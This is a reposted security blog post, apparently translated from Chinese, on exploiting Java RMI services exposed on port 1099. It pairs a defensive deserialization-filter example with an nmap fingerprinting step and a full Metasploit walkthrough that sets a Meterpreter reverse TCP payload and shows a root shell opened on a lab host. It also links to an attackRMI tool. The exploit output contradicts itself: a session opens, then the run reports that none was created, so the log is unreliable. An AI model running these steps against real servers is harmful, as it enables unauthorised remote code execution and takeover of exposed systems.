Java RMI exploitation (ports 1099/1090 exposed to the internet: RCE)

admin, 2023-03-24 23:37:05

Introduction to Java RMI

Java RMI stands for Remote Method Invocation. It is a mechanism that lets an object running in one Java virtual machine invoke methods on an object in another Java virtual machine.


RMI is part of J2SE and lets programmers build Java-based distributed applications. An RMI object is a remote Java object whose methods can be invoked from another JVM (even across a network) exactly as if they were methods of a local Java object, so objects spread across different JVMs look and behave like local objects.


For any RMI interface that takes an object as a parameter, you can send an object you constructed yourself, forcing the server to deserialize it as any serializable class present on its class path.


RMI transport is 100% based on deserialization. The default port is 1099.
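Because every RMI call deserializes its arguments, the JDK-level defense for the risk described above is a deserialization filter (JEP 290) that restricts which classes an ObjectInputStream may instantiate. The program below is an added example, not code from the original post or from any tool it mentions: it serializes two constructed classes, applies an allow-list filter, and shows the unexpected class being rejected. It assumes Java 9 or later (java.io.ObjectInputFilter); on 8u121+ the same API is sun.misc.ObjectInputFilter. The class names Allowed and NotAllowed are invented for the demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Added example (not from the original post): a JEP 290 deserialization filter,
// the JDK mechanism that bounds which classes an ObjectInputStream may instantiate.
// RMI's registry and transport layers accept the same filter pattern syntax.
public class RmiSerialFilterDemo {

    // The one type this hypothetical service expects to receive (constructed for the demo).
    static final class Allowed implements Serializable {
        private static final long serialVersionUID = 1L;
        long id = 42L;
    }

    // Any other serializable class stands in for an arbitrary class-path type (constructed for the demo).
    static final class NotAllowed implements Serializable {
        private static final long serialVersionUID = 1L;
        long id = -1L;
    }

    // Allow exactly the expected class, cap nesting depth and array sizes, reject everything else.
    // The same pattern string can be given to -Djdk.serialFilter=... for a process-wide filter.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "RmiSerialFilterDemo$Allowed;maxdepth=5;maxarray=1000;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Returns true if the stream deserialized under the filter, false if the filter rejected it.
    static boolean accepts(byte[] stream) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            ois.setObjectInputFilter(FILTER);   // per-stream filter, checked before any class is resolved
            ois.readObject();
            return true;
        } catch (InvalidClassException rejected) {
            // ObjectInputStream reports a REJECTED filter decision as InvalidClassException
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("Allowed    -> " + accepts(serialize(new Allowed())));
        System.out.println("NotAllowed -> " + accepts(serialize(new NotAllowed())));
    }
}
```

Compile and run with javac RmiSerialFilterDemo.java && java RmiSerialFilterDemo. Since JDK 8u121 the RMI registry and distributed garbage collector apply built-in filters of their own (tunable through the sun.rmi.registry.registryFilter and sun.rmi.transport.dgc.dgcFilter properties), but a remote method on your own service that accepts Object parameters is only covered by a process-wide jdk.serialFilter or a filter the service installs itself, which is what the example demonstrates. The Metasploit module used later on this page does not rely on a gadget chain but on loading a payload JAR from an HTTP codebase, a separate mechanism the JDK disables by default since 7u21 (java.rmi.server.useCodebaseOnly=true).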


Detecting a target RMI service

Use nmap -sV -p 1099 <IP address> to fingerprint the service version on the target.

  ~ nmap -sV -p 1099 10.0.2.5
  Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDT
  Nmap scan report for 10.0.2.5
  Host is up (0.00034s latency).

  PORT     STATE SERVICE     VERSION
  1099/tcp open  Java-rmi Java RMI Registry
  MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
  Service Info: Host: localhost

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds

RMI remote command execution, method one:

1. Use Metasploit to exploit the RMI RCE vulnerability; start msfconsole.

  ➜  ~ msfconsole
  [-] ***rting the Metasploit Framework console.../
  [-] * WARNING: No database support: No database YAML file
  [-] ***

       IIIIII    dTb.dTb        _.---._
         II     4'  v  'B   .'"".'/|`.""'.
         II     6.     .P  :  .' / |  `.  :
         II     'T;. .;P'  '.'  /  |    `.'
         II      'T; ;P'    `. /   |    .'
       IIIIII     'YvP'       `-.__|__.-'

  I love shells --egypt

         =[ metasploit v5.0.2-dev                           ]
  + -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
  + -- --=[ 541 payloads - 44 encoders - 10 nops            ]
  + -- --=[ 2 evasion                                       ]
  + -- --=[ ** This is Metasploit 5 development branch **   ]

2. Use the exploit/multi/misc/java_rmi_server module

  msf5 > use exploit/multi/misc/java_rmi_server
  msf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5
  rhosts => 10.0.2.5

3. Set the payload

  msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
  payload => java/meterpreter/reverse_tcp
  msf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12
  lhost => 10.0.2.12

4. Check the configuration

  msf5 exploit(multi/misc/java_rmi_server) > show options

  Module options (exploit/multi/misc/java_rmi_server):

     Name       Current Setting  Required  Description
     ----       ---------------  --------  -----------
     HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
     RHOSTS     10.0.2.5         yes       The target address range or CIDR identifier
     RPORT      1099             yes       The target port (TCP)
     SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT    8080             yes       The local port to listen on.
     SSL        false            no        Negotiate SSL for incoming connections
     SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
     URIPATH                     no        The URI to use for this exploit (default is random)

  Payload options (java/meterpreter/reverse_tcp):

     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     LHOST  10.0.2.12        yes       The listen address (an interface may be specified)
     LPORT  4444             yes       The listen port

  Exploit target:

     Id  Name
     --  ----
     0   Generic (Java Payload)

5. Run the exploit

  msf5 exploit(multi/misc/java_rmi_server) > run

  [*] Started reverse TCP handler on 10.0.2.12:4444
  [*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i
  [*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i
  [*] 10.0.2.5:1099 - Server started.
  [*] 10.0.2.5:1099 - Sending RMI Header...
  [*] 10.0.2.5:1099 - Sending RMI Call...
  [*] 10.0.2.5:1099 - Replied to request for payload JAR
  [*] Sending stage (53845 bytes) to 10.0.2.5
  [*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400
  id
  [-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
  [*] 10.0.2.5:1099 - Server stopped.
  [*] Exploit completed, but no session was created.
  msf5 exploit(multi/misc/java_rmi_server) > sessions -l

  Active sessions
  ===============

    Id  Name  Type                    Information            Connection
    --  ----  ----                    -----------            ----------
    1         meterpreter java/linux  root @ metasploitable  10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)

  msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
  [*] Starting interaction with 1...

  meterpreter > sysinfo
  Computer    : metasploitable
  OS          : Linux 2.6.24-16-server (i386)
  Meterpreter : java/linux

RMI remote command execution, method two

Download the tool directly: attackRMI.jar

GitHub addresses:
https://github.com/A-D-Team/attackRmi

https://github.com/waderwu/attackRmi



Originally published on the WeChat official account 红云谈安全: Java RMI exploitation (ports 1099/1090 exposed to the internet: RCE)

When reposting, please keep this link (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/1627768.html
